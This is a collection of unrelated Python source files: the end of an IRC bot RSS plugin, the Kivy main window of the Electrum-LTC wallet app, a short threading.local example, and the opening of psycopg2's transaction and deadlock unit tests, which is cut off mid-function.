''}) def format_entry(self, channel, feed, entry, is_announce): key_name = 'announceFormat' if is_announce else 'format' if feed.name in self.registryValue('feeds'): specific_key_name = registry.join(['feeds', feed.name, key_name]) template = self.registryValue(specific_key_name, channel) or \ self.registryValue(key_name, channel) else: template = self.registryValue(key_name, channel) date = entry.get('published_parsed') date = utils.str.timestamp(date) s = string.Template(template).substitute( entry, feed_name=feed.name, date=date) return self._normalize_entry(s) def announce_entry(self, irc, channel, feed, entry): if self.should_send_entry(channel, entry): s = self.format_entry(channel, feed, entry, True) if self.registryValue('notice', channel): m = ircmsgs.notice(channel, s) else: m = ircmsgs.privmsg(channel, s) irc.queueMsg(m) ########## # Commands @internationalizeDocstring def add(self, irc, msg, args, name, url): """<name> <url> Adds a command to this plugin that will look up the RSS feed at the given URL. """ self.assert_feed_does_not_exist(name, url) self.register_feed_config(name, url) self.register_feed(name, url, True, False) irc.replySuccess() add = wrap(add, ['feedName', 'url']) @internationalizeDocstring def remove(self, irc, msg, args, name): """<name> Removes the command for looking up RSS feeds at <name> from this plugin. """ feed = self.get_feed(name) if not feed: irc.error(_('That\'s not a valid RSS feed command name.')) return self.remove_feed(feed) irc.replySuccess() remove = wrap(remove, ['feedName']) class announce(callbacks.Commands): @internationalizeDocstring def list(self, irc, msg, args, channel): """[<channel>] Returns the list of feeds announced in <channel>. <channel> is only necessary if the message isn't sent in the channel itself. """ announce = conf.supybot.plugins.RSS.announce feeds = format('%L', list(announce.get(channel)())) irc.reply(feeds or _('I am currently not announcing any feeds.')) list = wrap(list, ['channel',]) @internationalizeDocstring def add(self, irc, msg, args, channel, feeds): """[<channel>] <name|url> [<name|url> ...] Adds the list of feeds to the current list of announced feeds in <channel>. Valid feeds include the names of registered feeds as well as URLs for RSS feeds. <channel> is only necessary if the message isn't sent in the channel itself. """ plugin = irc.getCallback('RSS') invalid_feeds = [x for x in feeds if not plugin.get_feed(x) and not utils.web.urlRe.match(x)] if invalid_feeds: irc.error(format(_('These feeds are unknown: %L'), invalid_feeds), Raise=True) announce = conf.supybot.plugins.RSS.announce S = announce.get(channel)() for name in feeds: S.add(name) announce.get(channel).setValue(S) irc.replySuccess() for name in feeds: feed = plugin.get_feed(name) if not feed: plugin.register_feed_config(name, name) plugin.register_feed(name, name, True, False) feed = plugin.get_feed(name) plugin.announce_feed(feed, True) add = wrap(add, [('checkChannelCapability', 'op'), many(first('url', 'feedName'))]) @internationalizeDocstring def remove(self, irc, msg, args, channel, feeds): """[<channel>] <name|url> [<name|url> ...] Removes the list of feeds from the current list of announced feeds in <channel>. Valid feeds include the names of registered feeds as well as URLs for RSS feeds. <channel> is only necessary if the message isn't sent in the channel itself. """ announce = conf.supybot.plugins.RSS.announce S = announce.get(channel)() for feed in feeds: S.discard(feed) announce.get(channel).setValue(S) irc.replySuccess() remove = wrap(remove, [('checkChannelCapability', 'op'), many(first('url', 'feedName'))]) @internationalizeDocstring def rss(self, irc, msg, args, url, n): """<name|url> [<number of headlines>] Gets the title components of the given RSS feed. If <number of headlines> is given, return only that many headlines. """ self.log.debug('Fetching %u', url) feed = self.get_feed(url) if not feed: feed = Feed(url, url, True) if irc.isChannel(msg.args[0]): channel = msg.args[0] else: channel = None self.update_feed_if_needed(feed) entries = feed.entries if not entries: irc.error(_('Couldn\'t get RSS feed.')) return n = n or self.registryValue('defaultNumberOfHeadlines', channel) entries = list(filter(lambda e:self.should_send_entry(channel, e), feed.entries)) entries = entries[:n] headlines = map(lambda e:self.format_entry(channel, feed, e, False), entries) sep = self.registryValue('headlineSeparator', channel) irc.replies(headlines, joiner=sep) rss = wrap(rss, [first('url', 'feedName'), additional('int')]) @internationalizeDocstring def info(self, irc, msg, args, url): """<url|feed> Returns information from the given RSS feed, namely the title, URL, description, and last update date, if available. """ try: url = self.registryValue('feeds.%s' % url) except registry.NonExistentRegistryEntry: pass feed = self.get_feed(url) if not feed: feed = Feed(url, url, True) self.update_feed_if_needed(feed) info = feed.data if not info: irc.error(_('I couldn\'t retrieve that RSS feed.')) return # check the 'modified_parsed' key, if it's there, convert it here first if 'modified' in info: seconds = time.mktime(info['modified_parsed']) now = time.mktime(time.gmtime()) when = utils.timeElapsed(now - seconds) + ' ago' else: when = _('time unavailable') title = info.get('title', _('unavailable')) desc = info.get('description', _('unavailable')) link = info.get('link', _('unavailable')) # The rest of the entries are all available in the channel key response = format(_('Title: %s; URL: %u; ' 'Description: %s; Last updated: %s.'), title, link, desc, when) irc.reply(utils.str.normalizeWhitespace(response)) info = wrap(info, [first('url', 'feedName')]) RSS = internationalizeDocstring(RSS) Class = RSS # vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
main_window.py
import re import os import sys import time import datetime import traceback from decimal import Decimal import threading import electrum_ltc as electrum from electrum_ltc.bitcoin import TYPE_ADDRESS from electrum_ltc import WalletStorage, Wallet from electrum_ltc_gui.kivy.i18n import _ from electrum_ltc.paymentrequest import InvoiceStore from electrum_ltc.util import profiler, InvalidPassword from electrum_ltc.plugins import run_hook from electrum_ltc.util import format_satoshis, format_satoshis_plain from electrum_ltc.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED from kivy.app import App from kivy.core.window import Window from kivy.logger import Logger from kivy.utils import platform from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty, StringProperty, ListProperty, BooleanProperty, NumericProperty) from kivy.cache import Cache from kivy.clock import Clock from kivy.factory import Factory from kivy.metrics import inch from kivy.lang import Builder # lazy imports for factory so that widgets can be used in kv Factory.register('InstallWizard', module='electrum_ltc_gui.kivy.uix.dialogs.installwizard') Factory.register('InfoBubble', module='electrum_ltc_gui.kivy.uix.dialogs') Factory.register('OutputList', module='electrum_ltc_gui.kivy.uix.dialogs') Factory.register('OutputItem', module='electrum_ltc_gui.kivy.uix.dialogs') #from kivy.core.window import Window #Window.softinput_mode = 'below_target' # delayed imports: for startup speed on android notification = app = ref = None util = False # register widget cache for keeping memory down timeout to forever to cache # the data Cache.register('electrum_ltc_widgets', timeout=0) from kivy.uix.screenmanager import Screen from kivy.uix.tabbedpanel import TabbedPanel from kivy.uix.label import Label from kivy.core.clipboard import Clipboard Factory.register('TabbedCarousel', module='electrum_ltc_gui.kivy.uix.screens') # Register fonts without this you won't be able to use bold/italic... # inside markup. from kivy.core.text import Label Label.register('Roboto', 'gui/kivy/data/fonts/Roboto.ttf', 'gui/kivy/data/fonts/Roboto.ttf', 'gui/kivy/data/fonts/Roboto-Bold.ttf', 'gui/kivy/data/fonts/Roboto-Bold.ttf') from electrum_ltc.util import base_units class ElectrumWindow(App): electrum_config = ObjectProperty(None) language = StringProperty('en') num_blocks = NumericProperty(0) num_nodes = NumericProperty(0) def set_URI(self, uri): self.switch_to('send') self.send_screen.set_URI(uri) def on_new_intent(self, intent): if intent.getScheme() != 'litecoin': return uri = intent.getDataString() self.set_URI(uri) def on_language(self, instance, language): Logger.info('language: {}'.format(language)) _.switch_lang(language) def update_history(self, *dt): if self.history_screen: self.history_screen.update() def on_quotes(self, d): Logger.info("on_quotes") self._trigger_update_history() def on_history(self, d): Logger.info("on_history") self._trigger_update_history() def _get_bu(self): return self.electrum_config.get('base_unit', 'LTC') def _set_bu(self, value): assert value in base_units.keys() self.electrum_config.set_key('base_unit', value, True) self._trigger_update_status() self._trigger_update_history() base_unit = AliasProperty(_get_bu, _set_bu) status = StringProperty('') fiat_unit = StringProperty('') def on_fiat_unit(self, a, b): self._trigger_update_history() def decimal_point(self): return base_units[self.base_unit] def btc_to_fiat(self, amount_str): if not amount_str: return '' rate = self.fx.exchange_rate() if not rate: return '' fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8) return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.') def fiat_to_btc(self, fiat_amount): if not fiat_amount: return '' rate = self.fx.exchange_rate() if not rate: return '' satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate)) return format_satoshis_plain(satoshis, self.decimal_point()) def get_amount(self, amount_str): a, u = amount_str.split() assert u == self.base_unit try: x = Decimal(a) except: return None p = pow(10, self.decimal_point()) return int(p * x) _orientation = OptionProperty('landscape', options=('landscape', 'portrait')) def _get_orientation(self): return self._orientation orientation = AliasProperty(_get_orientation, None, bind=('_orientation',)) '''Tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. :data:`orientation` is a read only `AliasProperty` Defaults to 'landscape' ''' _ui_mode = OptionProperty('phone', options=('tablet', 'phone')) def _get_ui_mode(self): return self._ui_mode ui_mode = AliasProperty(_get_ui_mode, None, bind=('_ui_mode',)) '''Defines tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. :data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone' ''' def __init__(self, **kwargs): # initialize variables self._clipboard = Clipboard self.info_bubble = None self.nfcscanner = None self.tabs = None self.is_exit = False self.wallet = None super(ElectrumWindow, self).__init__(**kwargs) title = _('Electrum-LTC App') self.electrum_config = config = kwargs.get('config', None) self.language = config.get('language', 'en') self.network = network = kwargs.get('network', None) self.plugins = kwargs.get('plugins', []) self.gui_object = kwargs.get('gui_object', None) self.daemon = self.gui_object.daemon self.fx = self.daemon.fx # create triggers so as to minimize updation a max of 2 times a sec self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5) self._trigger_update_status = Clock.create_trigger(self.update_status, .5) self._trigger_update_history = Clock.create_trigger(self.update_history, .5) # cached dialogs self._settings_dialog = None self._password_dialog = None def wallet_name(self): return os.path.basename(self.wallet.storage.path) if self.wallet else ' ' def on_pr(self, pr): if pr.verify(self.wallet.contacts): key = self.wallet.invoices.add(pr) if self.invoices_screen: self.invoices_screen.update() status = self.wallet.invoices.get_status(key) if status == PR_PAID: self.show_error("invoice already paid") self.send_screen.do_clear() else: if pr.has_expired(): self.show_error(_('Payment request has expired')) else: self.switch_to('send') self.send_screen.set_request(pr) else: self.show_error("invoice error:" + pr.error) self.send_screen.do_clear() def on_qr(self, data): from electrum_ltc.bitcoin import base_decode, is_address data = data.strip() if is_address(data): self.set_URI(data) return if data.startswith('litecoin:'): self.set_URI(data) return # try to decode transaction from electrum_ltc.transaction import Transaction try: text = base_decode(data, None, base=43).encode('hex') tx = Transaction(text) tx.deserialize() except: tx = None if tx: self.tx_dialog(tx) return # show error self.show_error("Unable to decode QR data") def update_tab(self, name): s = getattr(self, name + '_screen', None) if s: s.update() @profiler def update_tabs(self): for tab in ['invoices', 'send', 'history', 'receive', 'requests']: self.update_tab(tab) def switch_to(self, name): s = getattr(self, name + '_screen', None) if self.send_screen is None: s = self.tabs.ids[name + '_screen'] s.load_screen() panel = self.tabs.ids.panel tab = self.tabs.ids[name + '_tab'] panel.switch_to(tab) def show_request(self, addr): self.switch_to('receive') self.receive_screen.screen.address = addr def show_pr_details(self, req, status, is_invoice): from electrum_ltc.util import format_time requestor = req.get('requestor') exp = req.get('exp') memo = req.get('memo') amount = req.get('amount') popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv') popup.is_invoice = is_invoice popup.amount = amount popup.requestor = requestor if is_invoice else req.get('address') popup.exp = format_time(exp) if exp else '' popup.description = memo if memo else '' popup.signature = req.get('signature', '') popup.status = status txid = req.get('txid') popup.tx_hash = txid or '' popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', [])) popup.open() def qr_dialog(self, title, data, show_text=False): from uix.dialogs.qr_dialog import QRDialog popup = QRDialog(title, data, show_text) popup.open() def scan_qr(self, on_complete): if platform != 'android': return from jnius import autoclass from android import activity PythonActivity = autoclass('org.kivy.android.PythonActivity') Intent = autoclass('android.content.Intent') intent = Intent("com.google.zxing.client.android.SCAN") intent.putExtra("SCAN_MODE", "QR_CODE_MODE") def on_qr_result(requestCode, resultCode, intent): if requestCode == 0: if resultCode == -1: # RESULT_OK: contents = intent.getStringExtra("SCAN_RESULT") if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE': on_complete(contents) else: self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT")) activity.bind(on_activity_result=on_qr_result) try: PythonActivity.mActivity.startActivityForResult(intent, 0) except: self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing')) def scan_qr_zxing(self, on_complete): # uses zxing embedded lib if platform != 'android': return from jnius import autoclass from android import activity PythonActivity = autoclass('org.kivy.android.PythonActivity') IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator') integrator = IntentIntegrator(PythonActivity.mActivity) def on_qr_result(requestCode, resultCode, intent): if requestCode == 0: if resultCode == -1: # RESULT_OK: contents = intent.getStringExtra("SCAN_RESULT") if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE': on_complete(contents) else: self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT")) activity.bind(on_activity_result=on_qr_result) integrator.initiateScan() def do_share(self, data, title): if platform != 'android': return from jnius import autoclass, cast JS = autoclass('java.lang.String') Intent = autoclass('android.content.Intent') sendIntent = Intent() sendIntent.setAction(Intent.ACTION_SEND) sendIntent.setType("text/plain") sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data)) PythonActivity = autoclass('org.kivy.android.PythonActivity') currentActivity = cast('android.app.Activity', PythonActivity.mActivity) it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title))) currentActivity.startActivity(it) def build(self): return Builder.load_file('gui/kivy/main.kv') def _pause(self): if platform == 'android': # move activity to back from jnius import autoclass python_act = autoclass('org.kivy.android.PythonActivity') mActivity = python_act.mActivity mActivity.moveTaskToBack(True) def on_start(self): ''' This is the start point of the kivy ui ''' import time Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock())) win = Window win.bind(size=self.on_size, on_keyboard=self.on_keyboard) win.bind(on_key_down=self.on_key_down) #win.softinput_mode = 'below_target' self.on_size(win, win.size) self.init_ui() self.load_wallet_by_name(self.electrum_config.get_wallet_path()) # init plugins run_hook('init_kivy', self) # fiat currency self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else '' self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) # default tab self.switch_to('history') # bind intent for bitcoin: URI scheme if platform == 'android': from android import activity from jnius import autoclass PythonActivity = autoclass('org.kivy.android.PythonActivity') mactivity = PythonActivity.mActivity self.on_new_intent(mactivity.getIntent()) activity.bind(on_new_intent=self.on_new_intent) # URI passed in config uri = self.electrum_config.get('url') if uri: self.set_URI(uri) def get_wallet_path(self): if self.wallet: return self.wallet.storage.path else: return '' def on_wizard_complete(self, instance, wallet): if wallet: wallet.start_threads(self.daemon.network) self.daemon.add_wallet(wallet) self.load_wallet(wallet) self.on_resume() def load_wallet_by_name(self, path): if not path: return wallet = self.daemon.load_wallet(path, None) if wallet: if wallet != self.wallet: self.stop_wallet() self.load_wallet(wallet) self.on_resume() else: Logger.debug('Electrum: Wallet not found. Launching install wizard') storage = WalletStorage(path) wizard = Factory.InstallWizard(self.electrum_config, storage) wizard.bind(on_wizard_complete=self.on_wizard_complete) action = wizard.storage.get_action() wizard.run(action) def on_stop(self): self.stop_wallet() def stop_wallet(self): if self.wallet: self.daemon.stop_wallet(self.wallet.storage.path) self.wallet = None def on_key_down(self, instance, key, keycode, codepoint, modifiers): if 'ctrl' in modifiers: # q=24 w=25 if keycode in (24, 25): self.stop() elif keycode == 27: # r=27 # force update wallet self.update_wallet() elif keycode == 112: # pageup #TODO move to next tab pass elif keycode == 117: # pagedown #TODO move to prev tab pass #TODO: alt+tab_number to activate the particular tab def on_keyboard(self, instance, key, keycode, codepoint, modifiers): if key == 27 and self.is_exit is False: self.is_exit = True self.show_info(_('Press again to exit')) return True # override settings button if key in (319, 282): #f1/settings button on android #self.gui.main_gui.toggle_settings(self) return True def settings_dialog(self): if self._settings_dialog is None: from uix.dialogs.settings import SettingsDialog self._settings_dialog = SettingsDialog(self) self._settings_dialog.update() self._settings_dialog.open() def popup_dialog(self, name): if name == 'settings': self.settings_dialog() elif name == 'wallets': from uix.dialogs.wallets import WalletDialog d = WalletDialog() d.open() else: popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv') popup.open() @profiler def init_ui(self): ''' Initialize The Ux part of electrum. This function performs the basic tasks of setting up the ui. ''' from weakref import ref self.funds_error = False # setup UX self.screens = {} #setup lazy imports for mainscreen Factory.register('AnimatedPopup', module='electrum_ltc_gui.kivy.uix.dialogs') Factory.register('QRCodeWidget', module='electrum_ltc_gui.kivy.uix.qrcodewidget') # preload widgets. Remove this if you want to load the widgets on demand #Cache.append('electrum_ltc_widgets', 'AnimatedPopup', Factory.AnimatedPopup()) #Cache.append('electrum_ltc_widgets', 'QRCodeWidget', Factory.QRCodeWidget()) # load and focus the ui self.root.manager = self.root.ids['manager'] self.history_screen = None self.contacts_screen = None self.send_screen = None self.invoices_screen = None self.receive_screen = None self.requests_screen = None self.icon = "icons/electrum-ltc.png" # connect callbacks if self.network: interests = ['updated', 'status', 'new_transaction', 'verified'] self.network.register_callback(self.on_network, interests) self.tabs = self.root.ids['tabs'] def on_network(self, event, *args): if event == 'updated': self.num_blocks = self.network.get_local_height() self.num_nodes = len(self.network.get_interfaces()) self._trigger_update_wallet() elif event == 'status': self._trigger_update_status() elif event == 'new_transaction': self._trigger_update_wallet() elif event == 'verified': self._trigger_update_wallet() @profiler def load_wallet(self, wallet): self.wallet = wallet self.update_wallet() # Once GUI has been initialized check if we want to announce something # since the callback has been called before the GUI was initialized if self.receive_screen: self.receive_screen.clear() self.update_tabs() run_hook('load_wallet', wallet, self) def update_status(self, *dt): if not self.wallet: self.status = _("No Wallet") return if self.network is None or not self.network.is_running(): status = _("Offline") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height if not self.wallet.up_to_date or server_height == 0: status = _("Synchronizing...") elif server_lag > 1: status = _("Server lagging (%d blocks)"%server_lag) else: c, u, x = self.wallet.get_balance() text = self.format_amount(c+x+u) status = str(text.strip() + ' ' + self.base_unit) else: status = _("Not connected") n = self.wallet.basename() self.status = '[size=15dp]%s[/size]\n%s' %(n, status) def get_max_amount(self): inputs = self.wallet.get_spendable_coins(None) addr = str(self.send_screen.screen.address) or self.wallet.dummy_address() outputs = [(TYPE_ADDRESS, addr, '!')] tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config) amount = tx.output_value() return format_satoshis_plain(amount, self.decimal_point()) def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces) def format_amount_and_units(self, x): return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit @profiler def update_wallet(self, *dt): self._trigger_update_status() if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()): self.update_tabs() def notify(self, message): try: global notification, os if not notification: from plyer import notification icon = (os.path.dirname(os.path.realpath(__file__)) + '/../../' + self.icon) notification.notify('Electrum-LTC', message, app_icon=icon, app_name='Electrum-LTC') except ImportError: Logger.Error('Notification: needs plyer; `sudo pip install plyer`') def on_pause(self): # pause nfc if self.nfcscanner: self.nfcscanner.nfc_disable() return True def on_resume(self): if self.nfcscanner: self.nfcscanner.nfc_enable() # workaround p4a bug: # show an empty info bubble, to refresh the display self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None) def on_size(self, instance, value): width, height = value self._orientation = 'landscape' if width > height else 'portrait' self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone' def on_ref_label(self, label, touch): if label.touched: label.touched = False self.qr_dialog(label.name, label.data, True) else: label.touched = True self._clipboard.copy(label.data) Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.'))) def set_send(self, address, amount, label, message): self.send_payment(address, amount=amount, label=label, message=message) def show_error(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0, modal=False): ''' Show a error Message Bubble. ''' self.show_info_bubble( text=error, icon=icon, width=width, pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit, duration=duration, modal=modal) def show_info(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, duration=0, modal=False): ''' Show a Info Message Bubble. ''' self.show_error(error, icon='atlas://gui/kivy/theming/light/important', duration=duration, modal=modal, exit=exit, pos=pos, arrow_pos=arrow_pos) def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0, arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False): '''Method to show a Information Bubble .. parameters:: text: Message to be displayed pos: position for the bubble duration: duration the bubble remains on screen. 0 = click to hide width: width of the Bubble arrow_pos: arrow position for the bubble ''' info_bubble = self.info_bubble if not info_bubble: info_bubble = self.info_bubble = Factory.InfoBubble() win = Window if info_bubble.parent: win.remove_widget(info_bubble if not info_bubble.modal else info_bubble._modal_view) if not arrow_pos: info_bubble.show_arrow = False else: info_bubble.show_arrow = True info_bubble.arrow_pos = arrow_pos img = info_bubble.ids.img if text == 'texture': # icon holds a texture not a source image # display the texture in full screen text = '' img.texture = icon info_bubble.fs = True info_bubble.show_arrow = False img.allow_stretch = True info_bubble.dim_background = True info_bubble.background_image = 'atlas://gui/kivy/theming/light/card' else: info_bubble.fs = False info_bubble.icon = icon #if img.texture and img._coreimage: # img.reload() img.allow_stretch = False info_bubble.dim_background = False info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble' info_bubble.message = text if not pos: pos = (win.center[0], win.center[1] - (info_bubble.height/2)) info_bubble.show(pos, duration, width, modal=modal, exit=exit) def tx_dialog(self, tx): from uix.dialogs.tx_dialog import TxDialog d = TxDialog(self, tx) d.open() def sign_tx(self, *args): threading.Thread(target=self._sign_tx, args=args).start() def _sign_tx(self, tx, password, on_success, on_failure): try: self.wallet.sign_transaction(tx, password) except InvalidPassword: Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN"))) return Clock.schedule_once(lambda dt: on_success(tx)) def _broadcast_thread(self, tx, on_complete): ok, txid = self.network.broadcast(tx) Clock.schedule_once(lambda dt: on_complete(ok, txid)) def broadcast(self, tx, pr=None): def on_complete(ok, msg): if ok: self.show_info(_('Payment sent.')) if self.send_screen: self.send_screen.do_clear() if pr: self.wallet.invoices.set_paid(pr, tx.txid()) self.wallet.invoices.save() self.update_tab('invoices') else: self.show_error(msg) if self.network and self.network.is_connected(): self.show_info(_('Sending')) threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start() else: self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected')) def description_dialog(self, screen): from uix.dialogs.label_dialog import LabelDialog text = screen.message def callback(text): screen.message = text d = LabelDialog(_('Enter description'), text, callback) d.open() @profiler def amount_dialog(self, screen, show_max): from uix.dialogs.amount_dialog import AmountDialog amount = screen.amount if amount: amount, u = str(amount).split() assert u == self.base_unit def cb(amount): screen.amount = amount popup = AmountDialog(show_max, amount, cb) popup.open() def protected(self, msg, f, args): if self.wallet.has_password(): self.password_dialog(msg, f, args) else: apply(f, args + (None,)) def delete_wallet(self): from uix.dialogs.question import Question basename = os.path.basename(self.wallet.storage.path) d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet) d.open() def _delete_wallet(self, b): if b: basename = os.path.basename(self.wallet.storage.path) self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ()) def __delete_wallet(self, pw): wallet_path = self.get_wallet_path() dirname = os.path.dirname(wallet_path) basename = os.path.basename(wallet_path) if self.wallet.has_password(): try: self.wallet.check_password(pw) except: self.show_error("Invalid PIN") return self.stop_wallet() os.unlink(wallet_path) self.show_error("Wallet removed:" + basename) d = os.listdir(dirname) name = 'default_wallet' new_path = os.path.join(dirname, name) self.load_wallet_by_name(new_path) def show_seed(self, label): self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,)) def _show_seed(self, label, password): if self.wallet.has_password() and password is None: return keystore = self.wallet.keystore try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except: self.show_error("Invalid PIN") return label.text = _('Seed') + ':\n' + seed if passphrase: label.text += '\n\n' + _('Passphrase') + ': ' + passphrase def change_password(self, cb): if self.wallet.has_password(): self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,)) else: self._change_password(cb, None) def _change_password(self, cb, old_password): if self.wallet.has_password(): if old_password is None: return try: self.wallet.check_password(old_password) except InvalidPassword: self.show_error("Invalid PIN") return self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,)) def _change_password2(self, cb, old_password, new_password): self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password)) def _change_password3(self, cb, old_password, new_password, confirmed_password): if new_password == confirmed_password: self.wallet.update_password(old_password, new_password) cb() else: self.show_error("PIN numbers do not match") def password_dialog(self, msg, f, args): def callback(pw): Clock.schedule_once(lambda x: apply(f, args + (pw,)), 0.1) if self._password_dialog is None: from uix.dialogs.password_dialog import PasswordDialog self._password_dialog = PasswordDialog() self._password_dialog.init(msg, callback) self._password_dialog.open()
25.thread_Thread-specific Data.py
# While some resources need to be locked so multiple threads can use them, # others need to be protected so that they are hidden from view in threads that do not “own” them. The local() function creates an object capable of hiding values from view in separate threads. import random import threading import logging logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s', ) def show_value(data): try: val = data.value except AttributeError: logging.debug('No value yet') else: logging.debug('value=%s', val) def worker(data): show_value(data) data.value = random.randint(1, 100) show_value(data) local_data = threading.local() show_value(local_data) local_data.value = 1000 show_value(local_data) for i in range(2): t = threading.Thread(target=worker, args=(local_data,)) t.start()
test_transaction.py
#!/usr/bin/env python # test_transaction - unit test on transaction behaviour # # Copyright (C) 2007-2011 Federico Di Gregorio <fog@debian.org> # # psycopg2 is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # In addition, as a special exception, the copyright holders give # permission to link this program with the OpenSSL library (or with # modified versions of OpenSSL that use the same license as OpenSSL), # and distribute linked combinations including the two. # # You must obey the GNU Lesser General Public License in all respects for # all of the code used other than OpenSSL. # # psycopg2 is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public # License for more details. import threading from .testutils import unittest, ConnectingTestCase, skip_before_postgres, slow import psycopg2 from psycopg2.extensions import ( ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY) class TransactionTests(ConnectingTestCase): def setUp(self): ConnectingTestCase.setUp(self) self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE) curs = self.conn.cursor() curs.execute(''' CREATE TEMPORARY TABLE table1 ( id int PRIMARY KEY )''') # The constraint is set to deferrable for the commit_failed test curs.execute(''' CREATE TEMPORARY TABLE table2 ( id int PRIMARY KEY, table1_id int, CONSTRAINT table2__table1_id__fk FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''') curs.execute('INSERT INTO table1 VALUES (1)') curs.execute('INSERT INTO table2 VALUES (1, 1)') self.conn.commit() def test_rollback(self): # Test that rollback undoes changes curs = self.conn.cursor() curs.execute('INSERT INTO table2 VALUES (2, 1)') # Rollback takes us from BEGIN state to READY state self.assertEqual(self.conn.status, STATUS_BEGIN) self.conn.rollback() self.assertEqual(self.conn.status, STATUS_READY) curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2') self.assertEqual(curs.fetchall(), []) def test_commit(self): # Test that commit stores changes curs = self.conn.cursor() curs.execute('INSERT INTO table2 VALUES (2, 1)') # Rollback takes us from BEGIN state to READY state self.assertEqual(self.conn.status, STATUS_BEGIN) self.conn.commit() self.assertEqual(self.conn.status, STATUS_READY) # Now rollback and show that the new record is still there: self.conn.rollback() curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2') self.assertEqual(curs.fetchall(), [(2, 1)]) def test_failed_commit(self): # Test that we can recover from a failed commit. # We use a deferred constraint to cause a failure on commit. curs = self.conn.cursor() curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED') curs.execute('INSERT INTO table2 VALUES (2, 42)') # The commit should fail, and move the cursor back to READY state self.assertEqual(self.conn.status, STATUS_BEGIN) self.assertRaises(psycopg2.IntegrityError, self.conn.commit) self.assertEqual(self.conn.status, STATUS_READY) # The connection should be ready to use for the next transaction: curs.execute('SELECT 1') self.assertEqual(curs.fetchone()[0], 1) class DeadlockSerializationTests(ConnectingTestCase): """Test deadlock and serialization failure errors.""" def connect(self): conn = ConnectingTestCase.connect(self) conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE) return conn def setUp(self): ConnectingTestCase.setUp(self) curs = self.conn.cursor() # Drop table if it already exists try: curs.execute("DROP TABLE table1") self.conn.commit() except psycopg2.DatabaseError: self.conn.rollback() try: curs.execute("DROP TABLE table2") self.conn.commit() except psycopg2.DatabaseError: self.conn.rollback() # Create sample data curs.execute(""" CREATE TABLE table1 ( id int PRIMARY KEY, name text) """) curs.execute("INSERT INTO table1 VALUES (1, 'hello')") curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)") self.conn.commit() def tearDown(self): curs = self.conn.cursor() curs.execute("DROP TABLE table1") curs.execute("DROP TABLE table2") self.conn.commit() ConnectingTestCase.tearDown(self) @slow def test_deadlock(self): self.thread1_error = self.thread2_error = None step1 = threading.Event() step2 = threading.Event() def task1(): try: conn = self.connect() curs = conn.cursor() curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE") step1.set() step2.wait() curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE") except psycopg2.DatabaseError as exc: self.thread1_error = exc step1.set() conn.close() def task2(): try: conn = self.connect() curs = conn.cursor() step1.wait() 